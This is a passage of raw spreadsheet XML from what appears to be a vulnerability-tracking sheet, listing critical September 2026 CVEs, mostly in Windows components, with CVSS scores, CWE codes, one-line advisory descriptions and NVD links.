t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G37" s="5" t="inlineStr" /><c r="H37" s="5" t="n"><v>0.01</v></c><c r="I37" s="5" t="inlineStr" /><c r="J37" s="5" t="inlineStr" /><c r="K37" s="5" t="inlineStr" /><c r="L37" s="5" t="inlineStr" /><c r="M37" s="5" t="inlineStr" /><c r="N37" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O37" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P37" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q37" s="5" t="inlineStr" /><c r="R37" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S37" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T37" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t></is></c></row><row r="38"><c r="A38" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B38" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C38" s="5" t="inlineStr"><is><t>CVE-2026-69590</t></is></c><c r="D38" s="5" t="n"><v>9.800000000000001</v></c><c r="E38" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F38" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G38" s="5" t="inlineStr" /><c r="H38" s="5" t="n"><v>0.01</v></c><c r="I38" s="5" t="inlineStr" /><c r="J38" s="5" t="inlineStr" /><c r="K38" s="5" t="inlineStr" /><c r="L38" s="5" t="inlineStr" /><c r="M38" s="5" t="inlineStr" /><c r="N38" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O38" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P38" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q38" s="5" t="inlineStr" /><c r="R38" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S38" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T38" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t></is></c></row><row r="39"><c r="A39" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B39" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C39" s="5" t="inlineStr"><is><t>CVE-2026-69595</t></is></c><c r="D39" s="5" t="n"><v>9.800000000000001</v></c><c r="E39" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F39" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G39" s="5" t="inlineStr" /><c r="H39" s="5" t="n"><v>0.011</v></c><c r="I39" s="5" t="inlineStr" /><c r="J39" s="5" t="inlineStr" /><c r="K39" s="5" t="inlineStr" /><c r="L39" s="5" t="inlineStr" /><c r="M39" s="5" t="inlineStr" /><c r="N39" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O39" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P39" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q39" s="5" t="inlineStr" /><c r="R39" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S39" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T39" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t></is></c></row><row r="40"><c r="A40" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B40" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C40" s="5" t="inlineStr"><is><t>CVE-2026-69715</t></is></c><c r="D40" s="5" t="n"><v>9.800000000000001</v></c><c r="E40" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F40" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G40" s="5" t="inlineStr" /><c r="H40" s="5" t="n"><v>0.01</v></c><c r="I40" s="5" t="inlineStr" /><c r="J40" s="5" t="inlineStr" /><c r="K40" s="5" t="inlineStr" /><c r="L40" s="5" t="inlineStr" /><c r="M40" s="5" t="inlineStr" /><c r="N40" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O40" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P40" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q40" s="5" t="inlineStr" /><c r="R40" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S40" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T40" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t></is></c></row><row r="41"><c r="A41" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B41" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C41" s="5" t="inlineStr"><is><t>CVE-2026-69730</t></is></c><c r="D41" s="5" t="n"><v>9.800000000000001</v></c><c r="E41" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F41" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G41" s="5" t="inlineStr" /><c r="H41" s="5" t="n"><v>0.011</v></c><c r="I41" s="5" t="inlineStr" /><c r="J41" s="5" t="inlineStr" /><c r="K41" s="5" t="inlineStr" /><c r="L41" s="5" t="inlineStr" /><c r="M41" s="5" t="inlineStr" /><c r="N41" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O41" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P41" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q41" s="5" t="inlineStr" /><c r="R41" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S41" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T41" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t></is></c></row><row r="42"><c r="A42" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B42" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C42" s="5" t="inlineStr"><is><t>CVE-2026-69768</t></is></c><c r="D42" s="5" t="n"><v>9.800000000000001</v></c><c r="E42" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F42" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G42" s="5" t="inlineStr" /><c r="H42" s="5" t="n"><v>0.008999999999999999</v></c><c r="I42" s="5" t="inlineStr" /><c r="J42" s="5" t="inlineStr" /><c r="K42" s="5" t="inlineStr" /><c r="L42" s="5" t="inlineStr" /><c r="M42" s="5" t="inlineStr" /><c r="N42" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O42" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P42" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q42" s="5" t="inlineStr" /><c r="R42" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S42" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T42" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t></is></c></row><row r="43"><c r="A43" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B43" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C43" s="5" t="inlineStr"><is><t>CVE-2026-69769</t></is></c><c r="D43" s="5" t="n"><v>9.800000000000001</v></c><c r="E43" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F43" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G43" s="5" t="inlineStr" /><c r="H43" s="5" t="n"><v>0.008999999999999999</v></c><c r="I43" s="5" t="inlineStr" /><c r="J43" s="5" t="inlineStr" /><c r="K43" s="5" t="inlineStr" /><c r="L43" s="5" t="inlineStr" /><c r="M43" s="5" t="inlineStr" /><c r="N43" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O43" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P43" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q43" s="5" t="inlineStr" /><c r="R43" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S43" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T43" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t></is></c></row><row r="44"><c r="A44" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B44" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C44" s="5" t="inlineStr"><is><t>CVE-2026-69819</t></is></c><c r="D44" s="5" t="n"><v>9.800000000000001</v></c><c r="E44" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F44" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G44" s="5" t="inlineStr" /><c r="H44" s="5" t="n"><v>0.008999999999999999</v></c><c r="I44" s="5" t="inlineStr" /><c r="J44" s="5" t="inlineStr" /><c r="K44" s="5" t="inlineStr" /><c r="L44" s="5" t="inlineStr" /><c r="M44" s="5" t="inlineStr" /><c r="N44" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O44" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P44" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q44" s="5" t="inlineStr" /><c r="R44" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S44" s="5" t="inlineStr"><is><t>Out-of-bounds write in RPC Runtime allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T44" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69819</t></is></c></row><row r="45"><c r="A45" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B45" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C45" s="5" t="inlineStr"><is><t>CVE-2026-69824</t></is></c><c r="D45" s="5" t="n"><v>9.800000000000001</v></c><c r="E45" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F45" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G45" s="5" t="inlineStr" /><c r="H45" s="5" t="n"><v>0.01</v></c><c r="I45" s="5" t="inlineStr" /><c r="J45" s="5" t="inlineStr" /><c r="K45" s="5" t="inlineStr" /><c r="L45" s="5" t="inlineStr" /><c r="M45" s="5" t="inlineStr" /><c r="N45" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O45" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P45" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q45" s="5" t="inlineStr" /><c r="R45" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S45" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T45" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t></is></c></row><row r="46"><c r="A46" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B46" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C46" s="5" t="inlineStr"><is><t>CVE-2026-69829</t></is></c><c r="D46" s="5" t="n"><v>9.800000000000001</v></c><c r="E46" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F46" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G46" s="5" t="inlineStr" /><c r="H46" s="5" t="n"><v>0.011</v></c><c r="I46" s="5" t="inlineStr" /><c r="J46" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K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6" s="5" t="inlineStr" /><c r="M46" s="5" t="inlineStr" /><c r="N46" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O46" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P46" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q46" s="5" t="inlineStr" /><c r="R46" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S46" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T46" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t></is></c></row><row r="47"><c r="A47" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B47" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C47" s="5" t="inlineStr"><is><t>CVE-2026-69845</t></is></c><c r="D47" s="5" t="n"><v>9.800000000000001</v></c><c r="E47" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F47" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G47" s="5" t="inlineStr" /><c r="H47" s="5" t="n"><v>0.008999999999999999</v></c><c r="I47" s="5" t="inlineStr" /><c r="J47" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L47" s="5" t="inlineStr" /><c r="M47" s="5" t="inlineStr" /><c r="N47" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O47" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P47" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q47" s="5" t="inlineStr" /><c r="R47" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S47" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T47" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t></is></c></row><row r="48"><c r="A48" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B48" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C48" s="5" t="inlineStr"><is><t>CVE-2026-69910</t></is></c><c r="D48" s="5" t="n"><v>9.800000000000001</v></c><c r="E48" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F48" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G48" s="5" t="inlineStr" /><c r="H48" s="5" t="n"><v>0.01</v></c><c r="I48" s="5" t="inlineStr" /><c r="J48" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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8" s="5" t="inlineStr" /><c r="M48" s="5" t="inlineStr" /><c r="N48" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O48" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P48" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q48" s="5" t="inlineStr" /><c r="R48" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S48" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T48" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t></is></c></row><row r="49"><c r="A49" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B49" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C49" s="5" t="inlineStr"><is><t>CVE-2026-70296</t></is></c><c r="D49" s="5" t="n"><v>9.800000000000001</v></c><c r="E49" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F49" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G49" s="5" t="inlineStr" /><c r="H49" s="5" t="n"><v>0.01</v></c><c r="I49" s="5" t="inlineStr" /><c r="J49" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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 s="5" t="inlineStr" /><c r="M49" s="5" t="inlineStr" /><c r="N49" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O49" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P49" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q49" s="5" t="inlineStr" /><c r="R49" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S49" s="5" t="inlineStr"><is><t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T49" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t></is></c></row><row r="50"><c r="A50" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B50" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C50" s="5" t="inlineStr"><is><t>CVE-2026-71374</t></is></c><c r="D50" s="5" t="n"><v>9.800000000000001</v></c><c r="E50" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F50" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G50" s="5" t="inlineStr" /><c r="H50" s="5" t="n"><v>0.003</v></c><c r="I50" s="5" t="inlineStr" /><c r="J50" s="5" t="inlineStr" /><c r="K50" s="5" t="inlineStr" /><c r="L50" s="5" t="inlineStr" /><c r="M50" s="5" t="inlineStr" /><c r="N50" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q50" s="5" t="inlineStr" /><c r="R50" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S50" s="5" t="inlineStr"><is><t>Deserialization of untrusted data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is></c><c r="T50" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71374</t></is></c></row><row r="51"><c r="A51" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B51" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C51" s="5" t="inlineStr"><is><t>CVE-2026-71376</t></is></c><c r="D51" s="5" t="n"><v>9.800000000000001</v></c><c r="E51" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F51" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G51" s="5" t="inlineStr" /><c r="H51" s="5" t="n"><v>0.01</v></c><c r="I51" s="5" t="inlineStr" /><c r="J51" s="5" t="inlineStr" /><c r="K51" s="5" t="inlineStr" /><c r="L51" s="5" t="inlineStr" /><c r="M51" s="5" t="inlineStr" /><c r="N51" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O51" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P51" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q51" s="5" t="inlineStr" /><c r="R51" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S51" s="5" t="inlineStr"><is><t>OS command injection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is></c><c r="T51" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71376</t></is></c></row><row r="52"><c r="A52" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B52" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C52" s="5" t="inlineStr"><is><t>CVE-2026-71377</t></is></c><c r="D52" s="5" t="n"><v>9.800000000000001</v></c><c r="E52" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F52" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G52" s="5" t="inlineStr" /><c r="H52" s="5" t="n"><v>0.003</v></c><c r="I52" s="5" t="inlineStr" /><c r="J52" s="5" t="inlineStr" /><c r="K52" s="5" t="inlineStr" /><c r="L52" s="5" t="inlineStr" /><c r="M52" s="5" t="inlineStr" /><c r="N52" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O52" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P52" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q52" s="5" t="inlineStr" /><c r="R52" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="S52" s="5" t="inlineStr"><is><t>Command Argument Injection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through 11-00-12, from 09-87 before 09-87-10, from 09-80 through 09-80-04, from 09-70 before 09-70-28, from 09-50 through 09-50-22, and from 09-00 through 09-00-18.</t></is></c><c r="T52" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71377</t></is></c></row><row r="53"><c r="A53" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B53" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C53" s="5" t="inlineStr"><is><t>CVE-2026-72979</t></is></c><c r="D53" s="5" t="n"><v>9.800000000000001</v></c><c r="E53" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F53" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G53" s="5" t="inlineStr" /><c r="H53" s="5" t="n"><v>0.01</v></c><c r="I53" s="5" t="inlineStr" /><c r="J53" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K53" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L53" s="5" t="inlineStr" /><c r="M53" s="5" t="inlineStr" /><c r="N53" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O53" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P53" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q53" s="5" t="inlineStr" /><c r="R53" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S53" s="5" t="inlineStr"><is><t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T53" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t></is></c></row><row r="54"><c r="A54" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B54" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C54" s="5" t="inlineStr"><is><t>CVE-2026-72982</t></is></c><c r="D54" s="5" t="n"><v>9.800000000000001</v></c><c r="E54" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F54" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G54" s="5" t="inlineStr" /><c r="H54" s="5" t="n"><v>0.008999999999999999</v></c><c r="I54" s="5" t="inlineStr" /><c r="J54" s="5" t="inlineStr" /><c r="K54" s="5" t="inlineStr" /><c r="L54" s="5" t="inlineStr" /><c r="M54" s="5" t="inlineStr" /><c r="N54" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O54" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P54" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q54" s="5" t="inlineStr" /><c r="R54" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S54" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T54" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t></is></c></row><row r="55"><c r="A55" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B55" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C55" s="5" t="inlineStr"><is><t>CVE-2026-72983</t></is></c><c r="D55" s="5" t="n"><v>9.800000000000001</v></c><c r="E55" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F55" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G55" s="5" t="inlineStr" /><c r="H55" s="5" t="n"><v>0.008999999999999999</v></c><c r="I55" s="5" t="inlineStr" /><c r="J55" s="5" t="inlineStr" /><c r="K55" s="5" t="inlineStr" /><c r="L55" s="5" t="inlineStr" /><c r="M55" s="5" t="inlineStr" /><c r="N55" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O55" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P55" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q55" s="5" t="inlineStr" /><c r="R55" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S55" s="5" t="inlineStr"><is><t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T55" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t></is></c></row><row r="56"><c r="A56" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B56" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C56" s="5" t="inlineStr"><is><t>CVE-2026-73009</t></is></c><c r="D56" s="5" t="n"><v>9.800000000000001</v></c><c r="E56" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F56" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G56" s="5" t="inlineStr" /><c r="H56" s="5" t="n"><v>0.008999999999999999</v></c><c r="I56" s="5" t="inlineStr" /><c r="J56" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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6" s="5" t="inlineStr" /><c r="M56" s="5" t="inlineStr" /><c r="N56" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O56" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P56" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q56" s="5" t="inlineStr" /><c r="R56" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S56" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T56" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t></is></c></row><row r="57"><c r="A57" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B57" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C57" s="5" t="inlineStr"><is><t>CVE-2026-73010</t></is></c><c r="D57" s="5" t="n"><v>9.800000000000001</v></c><c r="E57" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F57" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G57" s="5" t="inlineStr" /><c r="H57" s="5" t="n"><v>0.008999999999999999</v></c><c r="I57" s="5" t="inlineStr" /><c r="J57" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L57" s="5" t="inlineStr" /><c r="M57" s="5" t="inlineStr" /><c r="N57" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O57" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P57" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q57" s="5" t="inlineStr" /><c r="R57" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S57" s="5" t="inlineStr"><is><t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T57" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t></is></c></row><row r="58"><c r="A58" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B58" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C58" s="5" t="inlineStr"><is><t>CVE-2026-73025</t></is></c><c r="D58" s="5" t="n"><v>9.800000000000001</v></c><c r="E58" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F58" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G58" s="5" t="inlineStr" /><c r="H58" s="5" t="n"><v>0.008999999999999999</v></c><c r="I58" s="5" t="inlineStr" /><c r="J58" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L58" s="5" t="inlineStr" /><c r="M58" s="5" t="inlineStr" /><c r="N58" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O58" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P58" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q58" s="5" t="inlineStr" /><c r="R58" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S58" s="5" t="inlineStr"><is><t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T58" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t></is></c></row><row r="59"><c r="A59" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B59" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C59" s="5" t="inlineStr"><is><t>CVE-2026-77089</t></is></c><c r="D59" s="5" t="n"><v>9.800000000000001</v></c><c r="E59" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F59" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G59" s="5" t="inlineStr" /><c r="H59" s="5" t="n"><v>0.003</v></c><c r="I59" s="5" t="inlineStr" /><c r="J59" s="5" t="inlineStr" /><c r="K59" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L59" s="5" t="inlineStr" /><c r="M59" s="5" t="inlineStr" /><c r="N59" s="5" 